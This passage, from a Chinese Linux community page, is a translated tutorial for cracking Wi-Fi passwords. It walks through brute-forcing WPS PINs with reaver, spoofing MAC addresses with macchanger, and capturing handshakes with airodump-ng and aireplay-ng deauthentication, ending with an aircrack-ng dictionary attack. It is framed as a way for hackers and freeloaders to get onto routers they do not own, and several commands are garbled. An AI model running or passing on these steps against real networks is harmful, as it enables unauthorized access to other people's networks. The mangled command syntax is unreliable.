找回密码
 骑士注册

QQ登录

微博登录

搜索
❏ 站外平台:

Linux中国开源社区 技术 查看内容

Wi-Fi Hacking

2012-07-25 08:14    评论: 2    

PART 2: 使用REAVER Hacking

原理简介:

Wi-Fi保护设置(WPS)中的这一安全漏洞是由安全研究人员StefanViehbock在2011年年底发现的,目前此漏洞的相应细节也已经被公开发布。黑客和蹭网者可以快速应用这个漏洞破译无线路由器密码。据美国计算机应急响应小组(US-CERT)称,受影响的厂商包括Belkin、Buffalo、D-Link、Linksys(思科)、Netgear、Technicolor、TP-Link和ZyXEL。

Step1:我们首先确定wifi网络中支持wps(Reaver 中可以看到),然后打开终端输入以下命令(wash已随Reaver 安装)

#wash -i mon0

然后打开reaver tool输入

#reaver -i mon0 -b ENTER_BSSID_HERE -vv

整个破解时间(获取WPS PIN, WPA PSK ,and AP ssid)需要大约2-4小时
所以总结来说,使用reaver来hacking wifi网络步骤容易,但是相对比较耗时。

PS.在更改 MAC address时,如果报错说wlan1 is busy,尝试输入以下命令 

#ifconfig wlan1 down (关闭接口)
#macchanger -A wlan1 (-A 设置一个随机的MAC地址和厂商)
#ifconfig wlan1 up (启动接口)

 

PART 3: 使用AIRCRACK Hacking

Step 1: 

#airmon-ng start wlan1 (监听模式)

Step 2:现在我们抓取几个wifi网络

#airodump-ng mon0

你可以看到BSSID,ESSID, and CHANNEL以及加密方式。
选择你想破解的BSSID

Step 3: 输入以下命令

#airodump-ng -c 1-w (filename)–bssid (bssid) mon0   

如上图,我们已经连接成功了。

Step 4: 

为了hack 这里的wpa/wpa2/wep,我们需要握手。为了形成握手,我们需要第三方从网络外面连入。

#aireplay-ng -05-a (bssid) mon0 

Step 5: 

现在一个握手包文件已经被创建,我们可以去看抓包结果啦。cirl+c停止step3中的进程,然后在终端中输入:

#aircrack-ng drag_file_into_terminal

Step 6: 最后输入以下命令进行破解

#aircrack-ng -w dictionary_directory handshake_file

文/Hari Krishnan 译/Thanks 

VIA http://www.freebuf.com/articles/5012.html

12
查看其它分页:

最新评论

我也要发表评论

微博评论 2012-07-20 15:06 回复
//@Linux中国: 转发微博

来自 Ricky变量 的新浪微博
微博评论 2012-07-22 08:17 回复
呵呵!

来自 朱明浪 的新浪微博

收藏

返回顶部

分享到微信

打开微信,点击顶部的“╋”,
使用“扫一扫”将网页分享至微信。